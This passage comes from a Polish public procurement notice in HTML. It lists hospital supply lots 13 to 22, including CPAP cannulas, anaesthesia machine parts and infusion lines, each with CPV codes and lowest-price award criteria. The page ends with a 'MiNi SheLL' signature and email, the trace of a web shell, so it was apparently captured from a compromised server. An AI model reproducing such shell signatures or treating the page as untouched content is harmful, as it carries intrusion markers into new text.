13	Pasek wymienny czerwony M			20	szt
14	Opaska na czoło do Baby Flow zielona L			15	szt
15	Pasek wymienny zielony L			15	szt
16	Opaska na czoło do Baby Flow pomarańczowa XL			15	szt
17	Pasek wymienny pomarańczowy XL			15	szt
18	Opaska na czoło do Baby Flow niebieska XXL			5	szt
19	Pasek wymienny niebieski XXL			5	szt
20	Opaska biało-czarna XXL plus			3	opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10 - KANIULE DONOSOWE DO CPAP.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kaniule do nCPAP z jednym odprowadzeniem do CPAP-U z dwoma krótkimi odprowadzeniami do przewodów nosowych minimalizujące odleżyny i martwicę rozmiar L			1	op
2.	Kaniule do nCPAP z jednym odprowadzeniem do CPAP-U z dwoma krótkimi odprowadzeniami do przewodów nosowych minimalizujące odleżyny i martwicę rozmiar S			1	op
3.	Kaniule do nCPAP z jednym odprowadzeniem do CPAP-U z dwoma krótkimi odprowadzeniami do przewodów nosowych minimalizujące odleżyny i martwicę rozmiar XS			1	op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11 - OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA OHMEDA EXELL AESTIVA 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sensor tlenu do aparatu do znieczulenia Ohmeda Exell			3	szt.
2.	Butelka ssaka przy aparacie do znieczulenia Ohmeda Exella Aestiva			1	szt.
3.	Kopułka 			10	szt.
4.	Płatek zastawki			10	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 12  OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA SULLA 808 909.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sensor tlenu do aparatu do znieczulenia Sulla 808 909			3	szt.
2.	Czujnik przepływu do aparatu do znieczulenia Sulla 808 909 , 1 op a 5 szt			2	op
3.	Kopułka do aparatu do znieczulenia Sulla 808 909			10	szt.
4.	Płatek zastawki do aparatu do znieczulenia Sulla 808 909			20	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 13 - OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA DAMECA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kopułka zastawki do aparatu do znieczulenia Dameca			6	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 14- USZCZELKI DO TROAKARÓW FIRMY STORZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Uszczelka do trokarów firmy STORZ, średnica otworu 3,9 mm , 1 op a 5 szt 			2	op
2.	Uszczelka do trokarów firmy STORZ, średnica otworu 9,0 mm 1 op a 5 szt 			2	op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.12.22.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 15 - OPRZYRZĄDOWANIE DO  ERO-SCAN  FIRMY OTICON.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Końcówka sondy zewnętrznej  mała                                     			15	szt.
2.	Końcówka sondy wewnętrznej  duża                                    			2	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 16 - OPRZYRZĄDOWANIE DO DIATERMII WERSAPOINT.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Elektroda do histeroskopowego systemu elektrochirurgicznego dostosowania wewnątrz jamy macicy w przebiegu histeroskopii z równoczesnym płukaniem roztworem soli fizjologicznej kulista			2	szt.
2.	Elektroda do histeroskopowego systemu elektrochirurgicznego dostosowania wewnątrz jamy macicy w przebiegu histeroskopii z równoczesnym płukaniem roztworem soli fizjologicznej śróbowa			2	szt.
3.	Elektroda do histeroskopowego systemu elektrochirurgicznego dostosowania wewnątrz jamy macicy w przebiegu histeroskopii z równoczesnym płukaniem roztworem soli fizjologicznej pętlowa			2	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr  17 - FILTR POWIETRZA DO SSAKA ELEKTYCZNEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtr powietrza do ssaka elektrycznego 7E-BAC/DC			4	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 18  -  CZĘŚCI DO ZAMYKANIA BUTELEK Z ROZTWOREM FORMALINY DO STERYLIZATORA TYPU FORMOMAT.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Korek gumowy jednorazowy do zamykania butelek z roztworem formaliny średnica 32 mm 			1 000	szt.
2.	Kapsel aluminiowy do kapslownicy sterylizatora typu FORMOMAT			1 000	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr  19- POJEMNIK DO CZYSZCZENIA IGIEŁ CHIRURGICZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dwuczęściowy pojemnik do czyszczenia i dezynfekcji igieł chirurgicznych w myjnii dezynfektorze, z możliwością poddawania sterylizacji parowej, wykonany ze stali nierdzewnej 18/10 średnica pojemnika 7-9 cm			10	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 20- OPRZYRZĄDOWANIE DO BRONCHOSKOPU BF 20 D.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zaworki biopsyjne 1 op a 20 szt			2	op
2	Olejek silikonowy a 15 ml 			3	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.68.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet Nr 21- SPRZĘT DO PRZETACZANIA PŁYNÓW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedłużacz do pomp infuzyjnych do podawania leków światłoczułych. Długośc około 1,5 m , kolor bursztynowy , końcówka LOCK			1200	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet Nr 22- PROBÓWKI DO MIKROMETODY DO BADAŃ BIOCHEMICZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Probówka do mikrometody do badań biochemicznych z kapilarą o pojemności 200 mikrolitrów z korkiem nakładanym na probówkę a nie wkładanym do wewnątrz probówki oraz bez żadnych zagłębień w obudowie zewnętrznej , wnętrze z zaokrąglonym dnem w kołnierzu przedłużajacym umozliwiajacym postawienie probówki . Probówka równa na całej długości.			800	szt
2	Probówka do mikrometody do badań biochemicznych z kapilarą o pojemności 500 mikrolitrów z korkiem nakładanym na probówkę a nie wkładanym do wewnątrz probówki wnętrze z zaokrąglonym dnem w kołnierzu przedłużajacym umozliwiajacym postawienie probówki . Probówka równa na całej długości bez żadnych zagłębień w obudowie zewnętrznej.			800	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com